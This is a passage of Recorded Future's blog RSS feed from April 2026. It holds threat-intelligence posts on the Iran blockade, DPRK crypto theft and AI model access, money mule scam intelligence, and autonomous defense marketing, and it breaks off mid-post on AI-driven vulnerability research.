          <li><strong>Iran’s hardliners are driving strategic deadlock, blockade resilience, and Strait closure.</strong> Insikt Group assesses Iran’s calculus is very likely shaped by IRGC influence and hardliner dominance: Supreme Leader Khamenei’s April 30 <a href="https://www.reuters.com/world/middle-east/irans-supreme-leader-mojtaba-khamenei-says-new-phase-taking-shape-gulf-strait-2026-04-30/">statement</a> frames Iranian control of the Strait of Hormuz as a post-American regional order, chief negotiator Ghalibaf has <a href="https://www.jns.org/news/world/ghalibaf-said-to-step-down-as-irans-top-negotiator-amid-internal-rifts">reportedly</a> resigned after a reprimand for raising nuclear issues in talks, and Iran’s public position has converged on a single precondition — the US must lift its naval blockade before negotiations can resume.</li>
          <li><strong>The US blockade has cut Iranian oil exports by ~70% but has not achieved its strategic objectives.</strong> Iran faces critical oil storage constraints — Bloomberg reported 22 days or less of unused capacity as of April 27 — yet Insikt Group assesses Iran can very likely survive the current pressure level, and the full financial blow will lag three to four months as ~130 million barrels already loaded before the blockade remain in transit.</li>
          <li><strong>Maritime standoff deepens as Iran seizes vessels, lays additional mines, and ceasefire talks stall.</strong> Following the US seizure of the Touska, the IRGC seized the MSC Francesca and Epaminondes and fired on a third vessel transiting the Strait; the IRGC reportedly dropped additional mines during the final week of April, and the Pentagon assesses mine-clearing could take up to six months after a formal end to hostilities.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1639b94af082849a6929a572441c5012d6e2eb22d.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Building with AI: Here's What No Briefing Will Tell You]]></title>
            <link>https://www.recordedfuture.com/blog/building-with-ai</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/building-with-ai</guid>
            <pubDate>Thu, 30 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[What building with AI for three months revealed about four leadership blind spots executives can't afford to ignore: the comprehension gap, eroding competitive moats, deployment complexity, and what "senior" really means now.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>Executives making AI decisions without hands-on building experience have a comprehension gap that no briefing can close.</li>
                <li>AI is rapidly eroding most traditional competitive moats, and proprietary data's real value now comes down to how long it would take a competitor to reconstruct it.</li>
                <li>As AI equalizes development speed, the most valuable engineers are those with sharp judgment, and companies need to actively protect the foundational skills that make that judgment possible.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_16b1d84f79c0e64645df026a3bf75634a68678460.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Money Mule Solution: What Every Scam Has in Common]]></title>
            <link>https://www.recordedfuture.com/blog/money-mule-solution</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/money-mule-solution</guid>
            <pubDate>Tue, 28 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how mule account intelligence — not tactic-tracking — is the most effective lever for preventing APP fraud before funds move.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li><strong>Scams are a $450B–$1T global problem</strong>, and unlike card fraud, they don't require a breach, just convincing a victim to send money themselves.</li>
                <li><strong>The mule account is the most stable target</strong>: every scam needs an exit point, and intelligence gathered before a transaction occurs is more actionable than behavioral monitoring after the fact.</li>
                <li><strong>CYBERA's approach uses agentic personas</strong> to engage active scammers and extract verified mule account details: confirmed intelligence, not probabilistic scoring.</li>
                <li><strong>Regulatory pressure is accelerating</strong>: the UK already mandates APP fraud reimbursement, and the US, Canada, and Australia are following, raising the stakes for institutions that don't act proactively.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_163af009dcce942c2656525fa83eab645571db892.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Lazarus Doesn't Need AGI]]></title>
            <link>https://www.recordedfuture.com/blog/lazarus-does-not-need-agi</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/lazarus-does-not-need-agi</guid>
            <pubDate>Tue, 28 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore the 2026 Claude Mythos breach, supply chain risks, and the $2B+ crypto theft pipeline.]]></description>
            <content:encoded><![CDATA[
        <p>Last week’s <a href="https://www.bloomberg.com/news/articles/2026-04-21/anthropic-s-mythos-model-is-being-accessed-by-unauthorized-users">reporting</a> on unauthorized access to Claude Mythos reads as an AI security story. It is also, structurally, a North Korea (DPRK) story. Even if the current suspects turn out to be Discord hobbyists.</p>
        <p>Mythos was meant to be contained. Within hours of the public <a href="https://www.anthropic.com/project/glasswing">Project Glasswing announcement</a>, a third-party contractor environment became the access vector. Not because Anthropic did something wrong. Because controlled release, at the scale modern enterprise software operates, is a goal rather than a guarantee.</p>
        <p>The interesting question isn’t who got in this time. It’s who gets in next, and their economics.</p>
        <h2>What happened?</h2>
        <p>The group accessed Mythos the same day it was announced, guessing the endpoint based on Anthropic’s naming conventions for prior models. The vector was an individual employed at a third-party contractor, not Anthropic’s core infrastructure. Source characterizations point to a research community “not wreaking havoc” with the model.</p>
        <h3>The misread</h3>
        <p>If the coverage only centers on Anthropic’s security posture or the AI safety debate, we’re missing an important angle.</p>
        <p>The structural signal is that any preview or controlled-access model release has porous boundaries by design. Access controls on paper (contracts, NDAs, approved vendor lists) differ from those in practice. Every partner brings their own contractors, endpoints, and people with legitimate credentials and uneven security hygiene. That is the real control surface, not the cryptographic perimeter around the model itself. Which makes this a supply chain problem that happens to be about AI, not an AI problem that happens to involve vendors.</p>
        <h3>The blind spot</h3>
        <p>AI policy discourse is locked on US versus China, including energy, chip controls, export rules, sovereign AI posture, and who wins the race.</p>
        <p>Structurally missing from the larger conversation is the one state actor whose entire foreign currency revenue stream is cyber-enabled theft. DPRK doesn’t need to win any race. They need a 20-30% productivity gain in existing operations.</p>
        <p>The pipeline is documented. Insikt Group’s <em><a href="https://www.recordedfuture.com/research/crypto-country-north-koreas-targeting-cryptocurrency">Crypto Country</a></em> estimated that regime-linked cryptocurrency theft reached roughly $3 billion through 2023. The <a href="https://www.state.gov/releases/office-of-the-spokesperson/2025/10/joint-statement-of-the-multilateral-sanctions-monitoring-team-msmt-on-the-report-covering-dprk-cyber-and-it-worker-activities">Multilateral Sanctions Monitoring Team</a> (successor to the UN Panel of Experts after Russia’s 2024 veto) has since done the harder primary work. MSMT’s October 2025 report documents $2.8 billion stolen from cryptocurrency companies between January 2024 and September 2025 across more than 40 heists, with proceeds explicitly tied to WMD and ballistic missile program funding. <a href="https://www.state.gov/releases/office-of-the-spokesperson/2026/01/the-democratic-peoples-republic-of-koreas-violations-and-evasions-of-un-sanctions-through-cyber-and-it-worker-activities/">The State Department updated the tally in January 2026</a>: another $400 million stolen in the three months since publication, bringing the 2025 totals above $2 billion.</p>
        <p><strong>Every successful crypto exchange intrusion ends up on a launch pad.</strong></p>
        <h2>Why North Korea wants the next model</h2>
        <p>Crypto exchange intrusions are labor-intensive at every phase. Recon, social engineering at scale (fake developer personas on GitHub and LinkedIn, spear-phishing of individual engineers at wallet providers), credential harvesting, post-exploit lateral movement, key extraction, and <a href="https://www.amazon.com/Lazarus-Heist-Hollywood-Finance-Inside/dp/024155425X">laundering</a>.</p>
        <p>Agentic capability compresses that cycle: the same operator-hours yield more successful intrusions and more stolen money per operator.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_15f31a75ee8d7950daa388a7f6eaceb059a2ebffa.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="1215" />
        </p>
        <p>Bybit is an easy example. <a href="https://www.fbi.gov/investigate/cyber/alerts/2025/north-korea-responsible-for-1-5-billion-bybit-hack">The FBI attributed approximately $1.5 billion in stolen virtual assets to TraderTraitor</a> in February 2025. <a href="https://fortune.com/crypto/2025/03/04/north-korea-bybit-hack-ethereum-safe-dprk-lazarus-group-tradertraitor/">The intrusion chain</a> ran months of patient targeting against a single Safe{Wallet} system administrator via phishing, followed by post-compromise operational patience. These types of attacks are expensive, time-intensive, and still extraordinarily productive.</p>
        <p>Lazarus and TraderTraitor don’t need AGI. They need the productivity lift that turns a junior operator into a senior one and shaves weeks off the planning phase. It doesn’t have to be Mythos specifically. Any comparable capability through a comparable vector does the job.</p>
        <p>Better tools mean more successful intrusions. More successful intrusions mean more stolen crypto. More stolen crypto means more missiles.</p>
        <h2>Three access patterns</h2>
        <p>Three different tradecraft patterns keep getting conflated in media coverage. They are not the same TTP, and treating them as one weakens the response on all three.</p>
        <p><strong>1. Contractor misuse.</strong> A legitimately credentialed employee at a third-party vendor uses their access for unauthorized purposes. This is the Mythos story. The credentials and access are real, though the intent is variable. Defenses (easy to say, hard to do well): telemetry, behavioral monitoring, and least-privilege scoping at the vendor tier.</p>
        <p><strong>2. Fraudulent hiring.</strong> An adversary places its own operatives inside the target through stolen or synthetic identities, often via remote IT contracting. This is the DPRK IT worker scheme. Insikt’s <em><a href="https://www.recordedfuture.com/research/inside-the-scam-north-koreas-it-worker-threat">Inside the Scam</a></em> documents PurpleBravo’s infrastructure: front companies in China spoofing legitimate IT firms, and a malware ecosystem (BeaverTail, InvisibleFerret, OtterCookie) targeting the cryptocurrency industry. The credentials are real, but the identities are fake. Defenses: identity verification at hire (in-person interviews to avoid AI tricks), ongoing personnel vetting, geographic and behavioral baselining.</p>
        <p><strong>3. Supply chain compromise.</strong> A trusted vendor’s systems get breached, and the attacker uses that vendor’s legitimate distribution channel to reach the real target. <a href="https://intelligence2risk.substack.com/p/digital-supply-chain-breach">TeamPCP’s March 2026 LiteLLM compromise</a> hit the AI toolchain directly, poisoning Trivy (a defensive security scanner) to reach a package with 95 million monthly downloads. Defenses: build-pipeline integrity, dependency monitoring, signed artifacts.</p>
        <p>These three attack vectors converge on the same truth. Any preview or limited-release AI program that depends on third parties is exposed to all three vectors simultaneously. DPRK is the actor most motivated across the full triangle because the revenue case is specific, measurable, and directly beneficial for the regime. They are incentivized to be “AI native.”</p>
        <h3>So what?</h3>
        <p>In the security industry, we need to stop thinking about AI access as purely a lab problem when it’s also a sanctions problem. The great-power competition framing obscures the actor already online, with a rich history of monetizing cyber heists to fund missiles.</p>
        <p>“Limited release” is a wonderful bumper sticker. The AI reality, from a threat-modeling perspective, is a countdown to turbo-charging adversarial capabilities.</p>
        <h3>Now what?</h3>
        <p>The honest conversation is that perimeter-style AI “controlled access” is less effective against state-sponsored adversaries. A productive security path is a distinct preview infrastructure, aggressive telemetry, canaries, and third-party access tied to personnel-level vetting rather than contractual attestation. (Guessable endpoints should be the first thing to go.)</p>
        <p>Crypto exchanges and custodians: your threat model needs to anticipate what Lazarus can do 3 to 6 months from now, not what they did last quarter. Assume they improve faster than your defenses do.</p>
        <p>Policymakers: DPRK is a first-class entity in AI access governance. The Multilateral Sanctions Monitoring Team framework already documents cyber-enabled sanctions evasion thoroughly. What it doesn’t yet do is name AI capability access as a sanctions-relevant category. Dual-use export controls have governed the transfer of semiconductor and missile technology for decades. AI capability is the obvious next category.</p>
        <p>Corporate CISOs (outside the AI-lab orbit): your third-party contractor environments are now inside the AI capability threat surface, whether you opted in or not. Inventory accordingly.</p>
        <h2>Close</h2>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ca2bf6995854d8b040cb1aac51172cac2a249bf3.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="1282" />
        </p>
        <p>Mythos is a preview of an access pattern. Any actor whose business model is stealing money to build weapons will find the third-party seam. This time, it was hobbyists. DPRK has spent two decades proving why nonproliferation is the right frame here.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1cd4a735414dc9382080bc199d70d19bf3a8c153e.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[From Overwhelmed to Autonomous: Rethinking Threat Intelligence in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/rethinking-threat-intelligence-in-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/rethinking-threat-intelligence-in-2026</guid>
            <pubDate>Fri, 24 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[For most security teams today, volume and access to intelligence isn’t the problem. It’s the speed at which they can turn that intelligence into action.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>The real challenge in cybersecurity isn’t intelligence or visibility, it’s speed. Attackers operate at machine speed, while most organizations are still constrained by manual, human-driven workflows.</li>
          <li>Traditional threat intelligence falls short because it stops at insight. To reduce risk effectively, intelligence must not only inform decisions but also actively drive response.</li>
          <li>Fragmentation across cyber, fraud, and third-party risk creates exploitable gaps. A unified, intelligence-driven approach is essential to understanding and addressing modern threats holistically.</li>
          <li>Autonomous defense is the path forward. By enabling continuous, real-time action across the attack surface, organizations can close the speed gap and move from reactive security to proactive risk reduction.</li>
        </ul>
        <p>For most security teams today, volume and access to intelligence isn’t the problem. It’s the speed at which they can turn that intelligence into action.</p>
        <p>Over the last decade, organizations have invested heavily in threat intelligence and cybersecurity. Global security spending has surged <a href="https://www.gartner.com/en/newsroom/press-releases/2024-08-28-gartner-forecasts-global-information-security-spending-to-grow-15-percent-in-2025">past $200 billion annually, growing double digits year over year,</a> while <a href="https://nationalcioreview.com/articles-insights/information-security/the-cost-of-good-security-analyzing-2024s-cyber-budget-trends">security’s share of IT budgets has climbed from under 9% to more than 13%</a>. Most CISOs report continued budget increases, and enterprises are making billion-dollar investments in intelligence capabilities.</p>
        <p>And yet, breaches still happen. Fraud still slips through. Third-party risk still catches teams off guard. The issue isn’t visibility. It’s the growing gap between how fast threats move and how fast organizations can respond.</p>
        <p>Attackers now operate at machine speed, leveraging automation and AI to identify vulnerabilities, launch campaigns, and exploit opportunities in real time. Most security teams, however, are still constrained by manual workflows, fragmented systems, and processes that require human intervention at every step. That mismatch is where risk can accumulate—and where even well-resourced teams fall behind.</p>
        <div>
          <div>
            <div>What many organizations are discovering is that the problem isn’t a lack of intelligence. The problem is their inability to turn the insights into contextualized, intelligence-led actions.</div>
          </div>
        </div>
        <h2>The Hidden Cost of Human-Speed Security</h2>
        <p>For many organizations, this gap shows up in subtle but compounding ways. Analysts spend hours triaging alerts, trying to determine which signals actually matter. Security teams often discover incidents after damage has already occurred, not because the data wasn’t there, but because it couldn’t be acted on quickly enough. Across the organization, teams responsible for cyber operations, fraud, and third-party risk operate in silos, each with their own tools and workflows, rarely sharing a unified view of risk.</p>
        <p>At the same time, expectations from leadership have shifted. Executives and boards no longer want activity metrics—<a href="https://www.idc.com/resource-center/blog/from-cyber-risk-to-business-risk-how-cisos-should-engage-the-board-in-2026">they want clear evidence that security investments are reducing business risk</a>. But when intelligence is not clearly connected to action from security teams, that proof becomes difficult to deliver.</p>
        <p>Traditional threat intelligence was designed to inform decisions made by humans, at human speed. In today’s environment, that model introduces delay. And delay, in cybersecurity, is increasingly indistinguishable from exposure.</p>
        <h2>Intelligence That Acts, Not Just Informs</h2>
        <p>Closing the speed gap requires more than incremental improvements. It requires a shift in how organizations think about intelligence altogether. Moving forward, the future of cybersecurity must be more than just intelligence-led—it must be intelligence-acted.</p>
        <p>In this model, intelligence doesn’t sit in dashboards waiting for analysts to interpret it. It continuously correlates signals, prioritizes what matters, and drives action across the security environment automatically. Instead of asking teams to move faster, it enables the entire system to operate at the speed of the threat.</p>
        <p>This is the foundation of autonomous defense, and it’s the future of effective, machine-speed cybersecurity.</p>
        <h2>From Reactive to Autonomous: A New Operating Model</h2>
        <p>Autonomous defense fundamentally changes the role of the security team. Rather than serving as the bottleneck between detection and response, analysts become decision-makers operating on top of continuously running intelligence.</p>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/products/autonomous-threat-operations">Autonomous Threat Operations</a> brings this model to life by eliminating the manual steps that slow teams down. It ingests and correlates intelligence from multiple sources, applies context in real time, and triggers actions across existing security tools—all without requiring constant human input.</p>
        <p>The impact of such a dramatic shift is immediate and measurable. Threat hunting becomes continuous instead of periodic. Alerts arrive enriched with context, reducing the time needed to investigate and respond. Detection and remediation workflows execute automatically, freeing analysts to focus on strategic threats rather than routine triage.</p>
        <p>Just as importantly, this approach transforms how organizations measure success. Instead of tracking activity—alerts processed, queries written, incidents reviewed—teams can demonstrate real outcomes: faster response times, reduced exposure, and a clearer connection between intelligence and risk reduction, the latter of which is becoming increasingly necessary for organizational buy-in.</p>
        <p>This is so much more than just adding another tool to the stack. Instead, it’s about making every existing control smarter, faster, and more effective. And it’s paying off. On average, <a href="https://app.userevidence.com/assets/1334BMEJ">security teams using Recorded Future save up to 100 hours per week through improved analyst productivity</a>, allowing teams to redirect effort toward threat hunting and proactive defense instead of repetitive manual analysis.</p>
        <h2>The Bigger Challenge: Fragmented Visibility Across the Attack Surface</h2>
        <p>Speed alone, however, is only part of the equation. Many organizations are also limited by how they view risk. Threats today don’t respect organizational boundaries. A phishing campaign can lead to credential theft, which can then be used to access systems, exploit third-party relationships, or enable fraudulent transactions. These events are connected, but still far too many organizations manage them in isolation.</p>
        <p>Cyber operations teams focus on internal threats. Fraud teams monitor transactions. Risk teams assess vendors. Each group has visibility into part of the problem, but no one has a complete picture. This fragmentation creates blind spots, and attackers are increasingly skilled at navigating between them.</p>
        <h2>A Unified Approach to Risk</h2>
        <p>To effectively reduce risk, organizations need more than faster response times. They need a connected understanding of their entire attack surface, along with the ability to act across it in a coordinated way.</p>
        <p>Recorded Future addresses this through four core solution areas—<a href="https://www.recordedfuture.com/products/cyber-operations">Cyber Operations</a>, <a href="https://www.recordedfuture.com/use-case/digital-risk">Digital Risk Protection</a>, <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Risk</a>, and <a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Payment Fraud Intelligence</a>—all built on a single, integrated intelligence foundation.</p>
        <p>In <a href="https://assets.recordedfuture.com/Datasheets/2026_0313%20-%20CyberOps%20Datasheet.pdf">cyber operations</a>, this means moving beyond alert overload to real-time prioritization. Instead of forcing analysts to sift through volumes of data, intelligence surfaces the threats that are most relevant to the organization’s environment and enables immediate action. The combination of prioritization and automation allows teams to reduce noise while improving both detection speed and response quality.</p>
        <p>In <a href="https://assets.recordedfuture.com/Datasheets/2026_0313%20-%20Digital%20Risk%20Protection.pdf">digital risk protection</a>, the focus shifts beyond the traditional perimeter. Today’s attackers target brands, customers, and executives just as frequently as they target infrastructure. By monitoring the open, <a href="https://www.recordedfuture.com/blog/dark-web-threat-intelligence">deep, and dark web</a>, Recorded Future provides visibility into impersonation campaigns, credential exposure, and emerging threats long before they impact the organization. More importantly, it enables rapid response, whether that means taking down fraudulent domains or preventing account takeover attempts.</p>
        <p><a href="https://assets.recordedfuture.com/Datasheets/Datasheet_Third-Party_Risk.pdf">Third-party risk</a> represents another growing challenge. As organizations expand their ecosystems, they inherit risk from vendors and partners, often without real-time visibility. Third-party involvement in breaches has reached a <a href="https://deepstrike.io/blog/cybersecurity-statistics-2025-threats-trends-challenges">staggering 30%, up from just 15% a year ago</a>. Static assessments and periodic reviews can’t keep pace with how quickly vendor risk evolves today. Continuous monitoring, grounded in real-world intelligence, allows organizations to detect issues earlier, respond faster, and maintain a more accurate understanding of their exposure.</p>
        <div>
          <div>
            <div>Threat intelligence-driven security is vital. It’s the eyes and ears of a security team. You can’t protect yourself against what you don’t know. A couple times now, Recorded Future has alerted us to something prior to the third-party vendor. That’s huge when we’re trying to protect our data.</div>
          </div>
          <div>
            <div>
              <p>Natalie Salisbury</p>
              <p>Strategic Threat Intelligence Analyst, Novavax</p>
            </div>
          </div>
        </div>
        <p>In the realm of <a href="https://assets.recordedfuture.com/Datasheets/2026_0310%20-%20Payment%20Fraud%20Intelligence.pdf">payment fraud</a> intelligence, the shift is equally significant. There were some <a href="https://www.recordedfuture.com/research/annual-payment-fraud-intelligence-report-2024">269 million records posted</a> across dark and clear web platforms in 2024, and a tripling of certain e-skimmer infections. It’s important to keep in mind that fraud doesn’t begin at the moment of transaction. Rather, it begins much earlier, in the environments where stolen data is exchanged and tested. Recorded Future provides comprehensive coverage across the complete payment fraud lifecycle. Sophisticated cleanup and normalization techniques result in better data quality and richer data sets, reducing manual research and enabling high confidence mitigation actions. By identifying these signals upstream and intervening, organizations can stop fraud before it’s executed, reducing both financial loss and customer impact.</p>
        <h2>One Intelligence Foundation. Total Visibility.</h2>
        <p>What makes this approach fundamentally different is that these capabilities are not delivered as isolated solutions. They are unified through the <a href="https://www.recordedfuture.com/platform">Recorded Future Intelligence Platform</a>, which correlates data across millions of sources and billions of entities to provide a single, coherent view of risk.</p>
        <p>This unified foundation enables organizations to connect signals that would otherwise remain siloed. Threat actors, infrastructure, vulnerabilities, and campaigns are all linked, allowing teams to understand not just what is happening, but what is likely to happen next.</p>
        <p>That level of visibility is what makes autonomous defense possible. And not just within a single domain, but across the entire attack surface.</p>
        <p>The urgency behind this shift cannot be overstated. Attackers are already operating at machine speed, using automation to scale their efforts and reduce the time between discovery and exploitation. At the same time, organizations that rely on manual processes are finding it increasingly difficult to keep up.</p>
        <p>The consequences of this gap are significant. Longer dwell times allow attackers to entrench themselves more deeply. Delayed responses increase the cost and impact of incidents. And as breaches and fraud events become more visible, customer trust becomes harder to maintain.</p>
        <p>This is no longer a question of optimization. It’s a question of whether existing operating models can keep pace with the reality of modern threats.</p>
        <h2>Rethinking What Threat Intelligence Should Do</h2>
        <p>As organizations evaluate their approach to cybersecurity, the role of threat intelligence needs to be reconsidered. It is no longer enough for intelligence to provide visibility. It must enable action. It must operate in real time. And it must extend across the full scope of organizational risk—not just one domain at a time.</p>
        <p>Equally important, it must deliver outcomes that matter to the business. Faster detection, reduced exposure, and measurable risk reduction are no longer aspirational. They are essential for enterprise security in the modern, AI-powered threat landscape.</p>
        <p>The goal for most organizations isn’t to replace their security stack. It’s to make it work better. By enabling intelligence to act autonomously, connecting visibility across domains, and aligning security operations with the speed of modern threats, organizations can close the gap that has long existed between insight and action. Recorded Future is built to make that possible.</p>
        <p>If your team is still struggling with alert fatigue, delayed responses, or fragmented visibility, the issue may not be a lack of resources. It may be a limitation in how intelligence is being applied.</p>
        <p>Now is the time to rethink that model.</p>
        <p><strong>Connect with Recorded Future to see how autonomous defense can help your organization move at the speed of today’s threats—and stay ahead of what comes next.</strong></p>
        <p><em><a href="https://www.recordedfuture.com/get-started">Contact us</a></em></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_12d6bc15802a3569cc98a12874c0790ad0d3cfa5f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Today, trust is the superpower that makes innovation possible]]></title>
            <link>https://www.recordedfuture.com/blog/trust-is-a-superpower</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/trust-is-a-superpower</guid>
            <pubDate>Thu, 23 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[How better intelligence and collaboration can unlock new opportunities for growth and greater financial health for more people.]]></description>
            <content:encoded><![CDATA[
        <p>The paradoxes of today’s digital world are well-known to anyone with a smartphone.</p>
        <p>Over the last decade, connectivity has expanded, yet the world has become more fragmented. Our everyday lives are more digital, but we spend more time parsing text messages for scams or deliberating the authenticity of potential deepfakes. Technology is delivering great productivity gains to small businesses while making them a larger target for cybercriminals.</p>
        <p>In this environment, exposure becomes the default: Access points are growing, control is hard and reacting to change stops working. AI intensifies these dynamics because it compresses time for everyone, including adversaries.</p>
        <p>Today, trust has become the most critical tool to move all businesses forward. Without trust, even the best ideas stall. People hesitate, adoption slows and growth stagnates.</p>
        <p>Trust used to be something businesses tried to repair after a breach. Now it must be the starting point, and something to nurture and continuously prove in a world that has fundamentally changed.</p>
        <p>It would be impossible to eliminate the risk entirely. Some estimates project <a href="https://www.statista.com/forecasts/1280009/cost-cybercrime-worldwide/">cybercrime could cost the world $15.6 trillion</a> annually before 2030, <a href="https://www.worlddata.info/largest-economies.php">surpassing all but two</a> of the world’s largest economies. Instead, the goal must be to build the ability to see sooner, decide faster and limit impact when, not if, something breaks. Trust today is all about bringing together speed, intelligence and collaboration, and that’s exactly what we’re developing across our teams.</p>
        <p>Getting this right isn’t just good business sense, but the only way to ensure new technologies are embraced and economies can keep growing.</p>
        <h2>The advantage is intelligence</h2>
        <p>Real advantage comes from understanding context and connecting signals across systems. That’s what turns data into better decisions. This kind of intelligence increases speed, reduces risk and enables proactive action. With the right intelligence, teams can hunt for threats continuously, test assumptions and act before harm occurs, not just triage alerts after the fact.</p>
        <p>You can see this shift in how the payments industry is evolving, including the work we’re doing by bringing Recorded Future’s threat intelligence together with Mastercard’s security capabilities, payments infrastructure and partnership models. We’re helping organizations understand where risk concentrates, how it propagates, and how quick, collective action can reduce the cost of cybercrime.</p>
        <p>Faster insights mean earlier action, which minimizes impact — and deepens trust.</p>
        <h2>Trust is built through collaboration</h2>
        <p>Security doesn’t scale through isolated heroics. It scales through ecosystems: shared signals, shared standards and partners who can move together as new threats arise, attack vectors shift and failures spread.</p>
        <p>Resilience is strongest when public and private sectors plan, exercise and respond together, rather than in parallel. Different players have different sightlines in the digital ecosystem. Startups look at the edges of innovation. Enterprises understand the realities of operating in today’s environment. Governments see where systemic risk concentrates. When those visions combine, our shields strengthen and expand, pushing cybercriminals out of the frame.</p>
        <p>During our time here in Miami for the <a href="https://emergeamericas.com/">eMerge Americas conference</a>, we’ve had the opportunity to speak to enterprises, startups, investors and government leaders about the need to accelerate resilience in Latin America, where the digital economy is booming but security hasn’t always kept pace. The region has the world’s fastest-growing rate of disclosed cyber incidents — in 2025 alone, <a href="https://www.recordedfuture.com/research/latin-america-and-the-caribbean-cybercrime-landscape">Recorded Future tracked</a> 452 ransomware incidents — but only seven countries have developed cybersecurity plans protecting critical infrastructure, and only 20 have formal computer security incident response teams.</p>
        <p>That gap is where trust breaks, and where more collaboration can become a growth necessity. We can’t build sustainable economic growth in Latin America without building digital trust and cyber resilience. That’s why we are deepening our footprint here, enhancing regional threat intelligence and resilience and paving the way for stronger public-private collaboration to address these complex risks.</p>
        <p>Secure digital access unlocks economic opportunity — and insecurity shuts it down fast. For a first-time digital user, one fraud incident can be enough to opt out for good. For a small business, one account takeover can wipe out months of progress. That’s why trust is inextricably linked to financial health. People can’t build stability on top of systems they’re afraid to use. At Mastercard, we’ve <a href="https://www.mastercard.com/us/en/news-and-trends/stories/2026/mastercard-500-million-commitment.html">committed to connecting and protecting 500 million people and small businesses by 2030</a>, because secure participation is foundational, not optional.</p>
        <p>The bar for digital innovation today is not what we can deliver, but what people will trust enough to use, depend upon and harness for their own financial health. Because in the end, trust is the superpower.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1a779e8a128e82a969d30b523eb27ea00232c78e2.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[AI Hype vs. Reality: Is AI Really Rewriting the Vulnerability Equation?]]></title>
            <link>https://www.recordedfuture.com/blog/ai-hype-vs-reality</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/ai-hype-vs-reality</guid>
            <pubDate>Wed, 22 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[AI vulnerability research and discovery capabilities are improving, but they have not changed the fundamentals of vulnerability management.]]></description>
            <content:encoded><![CDATA[
        <p>AI vulnerability research and discovery capabilities are improving, but they have not changed the fundamentals of vulnerability management. Instead, they are scaling up problems familiar to vulnerability managers: patch prioritization and remediation backlogs.</p>
        <p>For defenders, the timeline for determining which vulnerabilities matter most and remediating them before exploitation begins is narrowing, even as the overall volume of vulnerabilities rises. Organizations that rely on manual prioritization, slow patch cycles, or legacy software will face growing operational and security risks.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1fb4a4f2fe7e8c18423993bce78372f9b03bc2cb9.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="1111" />
            </div>
          </div>
          <div>
            <div><strong>Figure 1:</strong> Reality versus hype of automated vulnerability research</div>
          </div>
        </div>
        <h2>The Vulnerability to Exploit Ratio</h2>
        <p>Vulnerabilities are software flaws attackers can use to gain access, run malicious code, escalate privileges, or disrupt operations. However, not every bug becomes a real-world threat: many are hard to reach, difficult to weaponize, or simply not worth an attacker’s time.</p>
        <p>The total number of disclosed vulnerabilities has increased sharply in recent years, rising from roughly 21,000 in 2021 to nearly 50,000 in 2025. Part of that increase likely reflects stronger disclosure practices and bug bounty activity, though software growth, a broader attack surface, and more systematic reporting also play a role. Nonetheless, in 2025, Recorded Future only identified 446 vulnerabilities that were actively exploited in the wild, a reminder that confirmed exploitations remain a small fraction of total disclosures.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="Chart" src="https://www.recordedfuture.com/media_18527fc82a41818c43e47e083747868e40ae2a8c2.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="704" height="413" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Yearly comparison of disclosed CVEs against CVEs with public exploits and vulnerabilities assessed as actively exploited by the Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities (KEV) Catalog and Recorded Future, 2021-2025</em></div>
          </div>
        </div>
